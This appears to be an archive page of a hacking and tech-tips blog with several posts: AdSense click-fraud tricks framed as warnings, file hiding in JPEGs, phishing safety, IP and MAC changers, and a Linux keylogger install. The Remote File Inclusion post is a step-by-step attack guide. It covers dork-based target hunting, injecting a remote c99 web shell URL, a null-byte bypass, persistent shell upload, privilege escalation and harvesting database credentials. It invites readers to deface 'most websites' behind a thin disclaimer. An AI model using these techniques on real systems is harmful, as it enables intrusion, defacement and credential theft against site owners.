How people try to Cheat Google Adsense

Google adsense is the most profitable  revenue stream for publishers and also a reliable advertiser for its advertisers, but some people may try to earn more money by fraud clicks or many other ways that are mentioned here to finally get their  accounts banned. The post may sound good for people who came in searching for cheating tricks , but if you try these methods, you will surely end up banning your adsense account.So here are the tricks that you should not be doing just to earn some quick bucks..

google adsense





1 Clicking your own Ads
This is the most dumbest method and is mainly used by  noobs who don’t understand web technology and the internet . These fraud clicks may range from few clicks to even hundreds of clicks, just to make money faster. But the end result is no mystery.
2 Click through rate manipulation
Click Through Rate(CTR) of a page is usually considered to be 7% or less on an average.If there are more fraud clicks on your site, resulting in CTR of more than 10%, will surely raise Google’s flag. So some people try to adjust the click through rate by displaying the ads in junk low keyword density pages generating high traffic visits onto those pages. This then lowers the CTR below 10% and they even use the low CPC ads on those junk pages.
3 Fool the Visitors
When the site Admin puts the ads on the section of  ‘Sponsors’ or any other boxes with weird messages like ‘Support Us’ or ‘Click Here’, will raise flags to Google about these high clicked and low  value Ads and get their Account Banned soon enough.Only box title’s mentioned in the Google Adsense TOS policy can be used. So let your Ads look like Ads and don’t try to fool the visitors.
4 No Content , Only Ads in Page
If you insert all Adsense codes on a single page without content, then the user has no choice but to click on the Ads expecting to see some results or information that he came for, but this will lead to more Ad clicks which are closed instantly after the user discovers it as an Ad.So the Google has to protect its Advertisers and provide the value for what they are paying to Google.So google has no other choice but to terminate your account.
5 Ask Friends Or Family to Click your Ads
Here is another trick that’s used by noobs.  The Blogger might ask his friends living far off or abroad to click through his ads. But Google has enough Data from search engines or your profile across the internet to know how the clicks are generated and how that IP is related to your Address and find out if you have any friends or family in that place.So stop asking your relatives or friends to click your ads just because they live in far places.Multiple clicks from that friends IP location will get your Adsense account Banned.
6 The Popular Click Ring Network Cheat
The bloggers organize ring networks using the forums and social networking sites and plan the fraud clicks ,among their mutual website ads and click through each others ads.Once google finds out about this trick, you are sure to get banned from the program.
7 Proxy to Click Ads
Another popular trick among the publishers, for which they use proxy websites like the tor “onion routers” or any other anonymizer to click on their ads on their website.This trick is well known and might land your adsense account into big trouble.
8 Paid Ad Click Cheat
Paid Click Cheaters are often available for around $50 and mainly are people employed from developing countries like China,Phillipines,India or Pakistan. This lets the owner of the site to earn some money until his account gets banned from Google Adsense.
9 Automated Software ClickBots for Advertisements
The ClickBots are smart programs written in order to generate good CTR by browsing multiple pages on the site and then clicking on the ads, and stay for a few minutes to avoid suspicion. Some ClickBots even change their IP address , so that the Ads appear Genuine to Google.
10 Multiple Computers Click Fraud
This user Doesn’t have much knowledge about IP address or internet technology for that instance.The person tries to click on the ads from multiple computers from home ,Internet Centers, or any other internet spots.
Disclaimer: These methods mentioned here are solely to warn you about the consequences of your account getting banned if you try any of these methods listed here.And i do not recommend you to try any of these unethical tricks and even i don’t use these tricks myself. So this post is mainly to help you be aware of the reasons for Google adsense accounts getting banned and help you to prevent your account from getting banned …CHEERS..!!
Share:

How to Hide any file inside a Photo or any Image File

Hiding files inside an image file was never easy with all the nuisance encrypting and password protection by a software just to hide a file.But here is a simple trick to demonstrate how to hide any kind of file like .Exe or .flv or .txt inside a image file.
The art of hiding any file inside an image is called steganography and you can refer this link for more details.The trick uses a JPEG image file to store a any kind of file in it.So follow up these simple steps to hide a file inside the image..


Step 1 :
Get an JPEG image file and a txt file for this trick as in the screenshot, here i have used a text file and a JPG format file PS: Thats my cat with ma cellphone :P

Step 2 : Now select the files/files you want to hide and compress them in a ZIP or a RAR archive to get a compressed File.

Step 3 : Now open up your command prompt by going to Start->Run->Type ‘Cmd’ and Hit Enter. You will see the command prompt current folder set to Documents Directory. Now change to root directory C:\ by typing “cd \” where your files are located.
Step 4 : Now what you will need to do is combine both te image and RAR file to create a new image file that will look he same. Type in copy /b SAM_0573.JPG+FileToHide.rar NewImage.JPG in the command prompt and it will create a new image file of same format with the RAR file inside it.Here is the screenshot

Now you will notice that the image file size has increased as a result of the copied file inside it.
Now just compressing the file inside the image wont do, we need to get the file back.So the simple trick is to Open the Image file with WinRAR using Open With..
An alternate way to open the image file to get the file is to change the extension of the image file from .JPG to .RAR and open it as a compressed file.
Well there you have it, this is a simple trick to hide your files in an image and you can even use this trick to brag with your friends and show off your geeky side. Leave your comments or suggestions that you would like to share with us…Cheers.!!..:D..
Share:

Use Multiple Passwords for different Websites using a Single Master Password

Its a fact that majority of the web users tend to sign up and register in various websites and use the same passwords on them because its easier to remember.Well recent attacks on popular websites proved that this idea might be dangerous as hackers who gain data of any weak security website database  will try to use it for multiple accounts like paypal, using that  email address and  password, and most of the times find the passwords similar for these  accounts.




This is a terrible mistake as many people become victim of theft or malicious actions and this  will lead to creating a chain reaction of  the persons accounts getting hacked across various websites he had registered. So to prevent these kinds of attacks, its advisable to use different password for every different account, but this makes it harder to remember each password.
Solution –> So here is a firefox addon called Password Hasher which will generate random passwords for each website sign up using a master password. This addon has the following features
  • Easy to remember single master password for multiple passwords on different websites.
  • Change passwords using the site tag immediately.
  • Easy to change master key password without effecting other websites.
  • Generate passwords automatically.
  • Choice to select password length and type of passwords including case and digits.
So as its specified, its even provides the option for the generated password length and also prompts the usage of case and digits in the password to be generated.
To see the passwords on the browsers where the plugin is not available, it even generates a portable page as of to be able to carry the passwords with you all the time without the support of the addon.
Source :FirefoxMastery
Share:

How to hack websites by Remote File Inclusion

Hello friends,  Today i am going to explain and advanced method of hacking websites that is How to hack websites using Remote File Inclusion. As the name suggests Remote File Inclusion is technique where we inserts the file (in hacking terminology called Shell) in to the Website and gets the admin rights. Lets discuss this type of Website hacking technique in detail, so friends read on…                                                                                  Remote File Inclusion : Website hacking Method

What is Remote File Inclusion?

Remote File Inclusion is a method of hacking websites and getting the admin rights of the server by inserting a remote file usually called as SHELL (a shell is graphical user interface file which is used to browsing the remote files and running your own code on the web servers) into a website, whose inclusion allows the hackers to execute the server side commands as a current user logged on, and have the access to all the server files. With these rights we can continue to use local exploits to escalate our privileges and get control over the whole server.
Note: Remote File Inclusion (RFI) is the best ever technique to hack websites and more than 60% websites on the internet using PHP are vulnerable to this attack.

Which Websites are Vulnerable to Remote File Inclusion attack?

First and the very basic question arises in the mind of new hackers that How we can find the websites that its prone to remote file inclusion attack. And what are the basic vulnerabilities in the website that we will target to hack any website and web server. Answer to these questions is quite simple.
Many of the web servers are vulnerable to this type of attack because of PHP’s default settings of register_globals  and allow_url_fopen being enabled.
Note: In the PHP 6.0, register_globals has been removed but still the second vulnerability remains open, so we can give it a try to latest version PHP websites too. But a good news for hackers is that around 90% websites on the internet still uses old versions of PHP and another good news in those 90% websites, more than 60% websites has default settings enabled. That means we can hack most of the websites and deface them. Isn’t that cool, but as i have said we are ethical hackers we only find vulnerabilities in the websites .

Now lets start step by step Remote file inclusion method to hack websites:

Step 1: Finding the Vulnerable Websites

First of all we have to find the website that gets his pages using the PHP include() function and vulnerable to RFI (Remote File Inclusion). The best technique is to find websites using Google Dorks. Google dorks are simply the queries that are used to identify the specific search results.
Download the list of Dorks for RFI : CLICK HERE
I have already listed a lot off GOOGLE DORKS in my previous post of hacking websites, so you can look them here:
How to deface websites using SQL injection.

Step 2: Identifying Vulnerable website

Websites that have the page navigation system similar to below mentioned:
http://target-site.com/index.php?page=PageName

Step 3: Checking Website is Vulnerable or Not

To check if a the website is vulnerable to remote file inclusion attack, we would try to include a website link  instead of PageName as shown below:
http://target-site.com/index.php?page=http://google.com
Now if the Google Home Page opens, then its confirmed that website is vulnerable to Remote File Inclusion attack and we will continue our attack. If Google homepage doesn’t opens, we will try another website.

Step 4:  Remote Inclusion of Shells

Now we know that website is hackable, so we will now include the shells into the website. There are number of shells available online but my favorite are C99 and r57 because of their extended functionality and features.
There is no need to download these shells on your systems or PC, we can directly use the online resources for doing that but if you wish you can download them from their respective websites. I will not provide these here because its unethical but Google it and u can find them easily.
To find the a shell the hacker would search Google for:
inurl:c99.txt
This will display many websites with the shell already up and ready to be included.
Note: you must include a ? after the URL of Shell  so that if anything comes after c99.txt, it will be passed to the shell and not cause any problems.
For future use of Analysis you can download these shells from here:
http://www.localroot.net/
The new URL with the shell included would look like:
http://target-site.com/index.php?page=http://site.com/c99.txt?

Step 5: Adding Null Byte

Sometimes the PHP script on the server appends “.php” to the end of every included file. So if you included the shell, it would end up looking like “c99.txt.php” and not work. To get around this, you would add a null byte () to the end of c99.txt. This tells the server to ignore everything after c99.txt.

Step 6:  Vulnerabilities Database

In step one, I told you that hackers use Google dorks to look for sites possibly vulnerable to RFIs. An example of a Google dork would be:
allinurl:.php?page=
This looks for URL’s with .php?page= in them. This is only an example and you most likely won’t find any vulnerable sites with that search. You can try switching around the word “page” with other letters and similar
words.
Hackers usually search vulnerability databases like www.milw0rm.com for already discovered RFI vulnerabilities in site content management systems and search for websites that are running that vulnerable web application with a Google dork.

Step 6: If Attack Successful

If we succeeds in getting the server to parse the shell, then we will be see a screen similar to the following:                                                           hacking websites using remote file inclusion, learn how to hack websites
The shell will display information about the remote server and list all the files and directories on it. From here we would find a directory that has read and write privileges and upload the shell but this time as a .php file so that incase the vulnerability is fixed, he will be able to access it later on.

Step7: Find Root Privileges on Server

Now we would next find a way to gain root privileges on the system. We can do this by uploading and running local exploits against the server. you can find list of such exploits on milw0rm. We could also search the victim server for configuration files. These files most of the times contain username and passwords for the MYSQL databases and such.
That’s all the way to hack websites using the remote file inclusion method. I hope you all have liked it. And i am sure you all have a lot of questions regrading this, so don’t hesitate and ask in form of comments. I will try to clear all your queries.

How to Protect your Websites and Forums from Remote file inclusion attack?

As we are ethical hackers i will also explain for webmasters to protect their websites from RFI attack.
To protect yourself from RFI attacks, simply make sure you are using up-to-date scripts, and make sure you server php.ini file has register_globals and allow_url_fopen disabled.
Note: Website hacking is illegal, this article is for Educational purposes only.
Share:

How to identify and stay safe from phishing scams

Phishing is a type of social engineering form of hacking a persons private data like passwords or credit card details or any other private data by faking the identity of any legitimate trustworthy company or individual.Phishing is a basic form of hacking,to steal any sensitive data and due to the less complexity involved in carrying out this hack, it is one of the most widely used method of stealing ones sensitive data. Hence this kind of attack is mainly carried out by noobs who try to steal any sensitive data and the people who are  less conscious about these kinds of  scam usually fall as a victim.

So it is well advised to properly know the kind of  phishing tricks used by these hackers in order to avoid it and hence stay safe.So here we try to create awareness about the phishing techniques used by the hackers and also educate you on how to stay safe from these kinds of security risks.
  • Use a good email filter ,antivirus software and anti spyware to stay away from any phishing scams.Its advisable to use a internet browser that has phishing filters in it. eg:Firefox,chrome,Internet Explorer or Opera.
  • Avoid mails or any links that say you have won some fabulous prizes or a lottery of any kind.These are mainly phishing scams.
  • Visit the site by going through the address bar ,rather clicking on any shortcut link from untrusted websites.
  • Check the site name when visiting a site.It may have the same design logo and interface as a genuine site but the site name may contain names with slight alterations,like in case of paypal.com..it may be papyal.com or paypal-verification.com etc
  • The highest probability of phishing attacks are carried out through email’s.So be careful about the mails in your inbox that ask for your sensitive data.
  • Use popular email services like Gmail or YahooMail that offer the best spam filters from any kind of  spam or phishing emails.
  • Report any Phishing attack or any Spam as soon as possible to spam@uce.gov reportphishing@antiphishing.org ,so that the spam is contained as soon as possible and doesn’t spread across the internet.
  • Check any website that don’t use https:// while gathering sensitive data. If it is not in https:// then double check if the site is legitimate or not.
Well these points will help you stay safe on the internet and prevent you from any type of phishing attacks that harm you in any way.
If you would like to share any tip with us, then let us know by your comments.And keep visiting back for more interesting and useful topics ..Cheers,,:)
Share:

Change IP address instantly for free While Browsing

You may need to change your IP address while surfing the internet for anonymity from search engines storing your data or to access any specific location based service.  Of course you have a lot of tools offering these features like this, as the most popular anonymizer tool  tor.But the problem with that is it takes too much time to start up or it needs to be installed first to use it. But here is a free online tools that lets you change your IP address on the fly..




Here is a screenshot of the website, shows the multiple IP addresses to choose from and some may be free while others require to be purchased.
On clicking on any one of the IP addresses , it will take you to the next screen where it will display a sub address bar to your browser, which when you enter the url will redirect your request to the new IP address.
So there you go, an easy and a quick way to change your IP address on the go, without the hassle of installing any software.Try New IP Now and change your IP address instantly.
Share:

Get Yourself a Diaspora invite for Free – Limited Giveaway

Diaspora unlike Facebook or Google+ is a decentralized Social Network run by distributed Web servers maintained by some of their own users in “pods”. The Project is still under Development stage and is a invite only signup. Diaspora is gaining popularity because of the privacy concerns haunting people in major social networking sites like Facebook and Google+ which are centralized.And So i’ve got some 30 Diaspora invites to giveaway..so read on.!!


For those of you who still haven’t  registered for Google+, how about checking out Diaspora for the time being until that time. Diaspora allows invites of about 10 per account, but it is possible to send more invites. So follow these steps to land yourself a invite to the most popular open social networking site available on the internet.
Here is a simple favor i request you to do in return for the Diaspora invite,
1. Follow @hottechtips or like the Facebook Page and share this Facebook
2. Tweet the post in the format given below with the username.
Get Diaspora invites now- Unlimited Giveaway http://su.pr/4TjOno  @hottechtips
And leave your comment on why would you like to join diaspora and don’t mention your email id on the comment body,as it may lead to spam mails, so enter your email id in the box provided so  only i can see it at the back-end of the site, and send you the invite.Hurry up before my 30 invites run out…:)
Share:

How to Get your Own Google+ (Plus) Short Vanity Url

Sharing your Google Plus profile link is difficult as  Google plus doesn’t yet support short url’s for the Google+ profiles yet. So Instead you will need to use the long unique number assigned  to each Google Plus profile, which is difficult to remember and also makes sharing your profile difficult. But there is an alternative to get your own vanity url for your Google plus profile.




Gplus.to is a service that makes it easier to get your own short url for your profile to share it with your friends.This lets you create your own vanity url for your long Google Plus profile and allows you to register your username from 3 characters to 25 characters in length.Just enter in your Google Plus Profile Id in the right and get the desired available username to link that Google Plus Profile Id.
Well there you have it, a service that lets you get your own short url like in Facebook,which will provide you with a unique link to share with your friends.Link –> Gplus.to
Share:

How to install Linux KeyLogger in Ubuntu

A keylogger is hardware/software based, that works on the background and maps every key stroke onto a log file without the users awareness.
For linux x86 architecture, LKL is the common keylogger ,also known as Linux KeyLogger.Linux Key Logger is a open source and a free software.Once installed the keylogger maps the keyboard port 0×60 for all the keystrokes into a log file.So here is how to install the software in Ubuntu.






Steps for installing LKL:
Step 1: Download the software using the sourceforge link here.
Step 2 : Extract the files from the archive.
Step 3 : Open the Console and move the directory to this lkl folder, cd lkl.
Step 4 : Next check the required resources by running the ./configure command.
Step 5 : Compile the package using the make command and after that you can even run the make check to run the optional tests after the make.
Step 6 : Run sudo make install to install the package program.
This completes the installation process of the software.
After you finis installing the software, here are the instructions and options to work with the software.

Instructions for use:
Type ‘lkl‘ command with the following options
-k  <keymap_file> : set keymap file
-o <output_file>    : set an output file
-l   : start logging keystrokes via keyboard port
-h  : help
-m <mail_id>         : mail the logs to specific email
-t   <host>                : set host to send to mail (default : localhost)
-b  : set debug mode
Hope this helped you in successfully installing the software.Leave your comments below for queries or any other help.Cheers..:)
Share:

How to Change Your MAC Address in Windows

Every Network interface card(NIC) is assigned a unique address called a Media Access Control (MAC) Address which is assigned by the card manufacturer, different from any other NIC. This MAC address is use during the packet transmission when connected to any wired/wireless network. But in case you need to change the MAC address of your Machine in certain cases where a range of specific MAC addresses may not be permitted in some networks, then there is a simpler and easier alternative to carry out this process.
Win7 MAC Address change is a free software tool available for windows , that lets you change the MAC address of your network adapter of either wired/wireless cards. The software doesn’t require any installation and  can be run directly on download. The software needs to be run in administrator mode for the required permissions to change the MAC address.

Features:
  • Small Size of the software 75kB and easily portable.
  • Simple interface and easy to use.
  • Supports all network card vendors of both wired and wireless network cards
  • No installation required
  • Also supports Windows XP and Vista
  • Random MAC address  generator.
  • MAC address can be reset easily to default by Reset button.
  • Generates Logs of changes made ,and hence user can easily undo any changes.
  • System information can be obtained using the System Information Module
Download Link:  Win7 MAC Address Changer
Share:

DISCLAIMER

The information provided on hottechtips.blogspot.com is to be used for educational purposes only. The website creator is in no way responsible for any misuse of the information provided. All of the information in this website is meant to help the reader develop a hacker defense attitude in order to prevent the attacks discussed. In no way should you use the information to cause any kind of damage directly or indirectly. The word “Hack” or “Hacking” on hottechtips.blogspot.com should be regarded as “Ethical Hack” or “Ethical hacking” respectively. You implement the information given at your own risk.